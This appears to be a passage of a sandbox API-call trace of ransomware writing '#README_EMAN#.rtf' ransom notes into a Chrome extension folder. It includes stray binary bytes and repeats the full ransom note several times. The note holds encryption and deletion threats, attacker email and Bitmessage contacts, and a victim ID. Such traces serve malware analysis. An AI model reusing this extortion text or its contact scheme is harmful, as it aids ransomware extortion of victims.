\\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.548] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.549] CloseHandle (hObject=0x2c8) returned 1 [0278.549] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0278.549] GetLastError () returned 0x2 [0278.549] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.550] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.550] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.550] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 